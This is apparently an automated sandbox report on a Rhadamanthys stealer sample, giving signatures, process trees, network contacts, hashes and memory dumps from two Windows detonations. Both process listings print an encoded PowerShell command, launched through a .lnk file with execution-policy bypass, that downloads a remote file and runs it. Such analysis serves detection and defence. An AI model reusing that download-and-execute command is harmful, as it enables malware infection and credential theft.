Malware Analysis Report

2024-11-13 13:50

Sample ID: 240405-jk4fjsfb53
Target:    6391-BST-SH.zip
SHA256:    31bf95ff1e9fc8d0a1787c473e12a1448e7c34ea586e4c4ee5f68ab5d15ac594
Tags:      rhadamanthys stealer
Score:     10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score:        10/10
SHA256:       31bf95ff1e9fc8d0a1787c473e12a1448e7c34ea586e4c4ee5f68ab5d15ac594
Threat Level: Known bad

The file 6391-BST-SH.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-05 07:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted:        2024-04-05 07:44
Reported:         2024-04-05 07:47
Platform:         win10v2004-20240226-en
Max time kernel:  128s
Max time network: 129s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description: PID 3236 created 2528
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description: N/A
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      N/A

Checks computer location settings

Description: Key value queried
Indicator:   \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation
Process:     C:\Windows\system32\cmd.exe
Target:      N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\6391-BST-SH.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwB2AGkAegBpAGoAYQAzADYAMAAuAGwAdAAvAGQAbwBjAC4AdAB4AHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACAAfAAgAGkATgB2AE8AawBFAC0ARQB4AFAAcgBlAFMAcwBpAE8AbgA=

C:\Windows\system32\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

Country  Destination         Domain                         Proto
US       8.8.8.8:53          vizija360.lt                   udp
LT       193.46.84.144:443   vizija360.lt                   tcp
US       8.8.8.8:53          149.220.183.52.in-addr.arpa    udp
US       8.8.8.8:53          138.136.73.23.in-addr.arpa     udp
US       8.8.8.8:53          144.84.46.193.in-addr.arpa     udp
US       8.8.8.8:53          68.32.126.40.in-addr.arpa      udp
US       8.8.8.8:53          217.106.137.52.in-addr.arpa    udp
US       8.8.8.8:53          86.23.85.13.in-addr.arpa       udp
US       8.8.8.8:53          15.164.165.52.in-addr.arpa     udp
US       8.8.8.8:53          65.139.73.23.in-addr.arpa      udp
NL       52.142.223.178:80   N/A                            tcp
US       8.8.8.8:53          145.136.73.23.in-addr.arpa     udp
US       8.8.8.8:53          14.227.111.52.in-addr.arpa     udp
US       8.8.8.8:53          136.136.73.23.in-addr.arpa     udp
US       8.8.8.8:53          138.32.126.40.in-addr.arpa     udp

Files

memory/3236-2-0x000001F7B9980000-0x000001F7B99A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwr2h0yp.vu5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3236-12-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

memory/3236-13-0x000001F7B9A60000-0x000001F7B9A70000-memory.dmp

memory/3236-14-0x000001F7B9A60000-0x000001F7B9A70000-memory.dmp

memory/3236-15-0x000001F7B99D0000-0x000001F7B9A2E000-memory.dmp

memory/3236-16-0x000001F7B9A30000-0x000001F7B9A40000-memory.dmp

memory/3236-18-0x000001F7B9A30000-0x000001F7B9A40000-memory.dmp

memory/3236-17-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-20-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-19-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-21-0x00007FF891F90000-0x00007FF892185000-memory.dmp

memory/3236-23-0x00007FF890960000-0x00007FF890A1E000-memory.dmp

memory/3236-22-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-24-0x00007FF88F7E0000-0x00007FF88FAA9000-memory.dmp

memory/2488-25-0x000002608BCF0000-0x000002608BCF9000-memory.dmp

memory/2488-30-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/2488-29-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/3236-31-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

memory/2488-33-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/2488-34-0x00007FF891F90000-0x00007FF892185000-memory.dmp

memory/2488-35-0x00007FF890960000-0x00007FF890A1E000-memory.dmp

memory/3236-32-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/2488-36-0x00007FF88F7E0000-0x00007FF88FAA9000-memory.dmp

memory/2488-37-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted:        2024-04-05 07:44
Reported:         2024-04-05 07:47
Platform:         win11-20240221-en
Max time kernel:  147s
Max time network: 149s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description: PID 3760 created 3004
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description: N/A
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Indicator:   N/A
Process:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target:      N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\6391-BST-SH.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwB2AGkAegBpAGoAYQAzADYAMAAuAGwAdAAvAGQAbwBjAC4AdAB4AHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACAAfAAgAGkATgB2AE8AawBFAC0ARQB4AFAAcgBlAFMAcwBpAE8AbgA=

C:\Windows\system32\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

Country  Destination         Domain                         Proto
US       8.8.8.8:53          vizija360.lt                   udp
LT       193.46.84.144:443   vizija360.lt                   tcp
US       8.8.8.8:53          144.84.46.193.in-addr.arpa     udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmrw2nlz.dxo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-11-0x00007FFA197C0000-0x00007FFA1A282000-memory.dmp

memory/3760-10-0x000001F0FB6E0000-0x000001F0FB702000-memory.dmp

memory/3760-12-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-13-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-14-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-15-0x000001F0FBB60000-0x000001F0FBBBE000-memory.dmp

memory/3760-16-0x000001F0FBBC0000-0x000001F0FBBD0000-memory.dmp

memory/3760-18-0x000001F0FBBC0000-0x000001F0FBBD0000-memory.dmp

memory/3760-19-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-17-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-20-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-21-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-22-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-23-0x00007FFA397E0000-0x00007FFA3989D000-memory.dmp

memory/2720-25-0x000001E4B87B0000-0x000001E4B87B9000-memory.dmp

memory/3760-24-0x00007FFA37E00000-0x00007FFA38174000-memory.dmp

memory/3760-29-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-31-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/2720-32-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-35-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-34-0x00007FFA197C0000-0x00007FFA1A282000-memory.dmp

memory/2720-38-0x00007FFA37E00000-0x00007FFA38174000-memory.dmp

memory/2720-37-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-36-0x00007FFA397E0000-0x00007FFA3989D000-memory.dmp

memory/2720-39-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-40-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp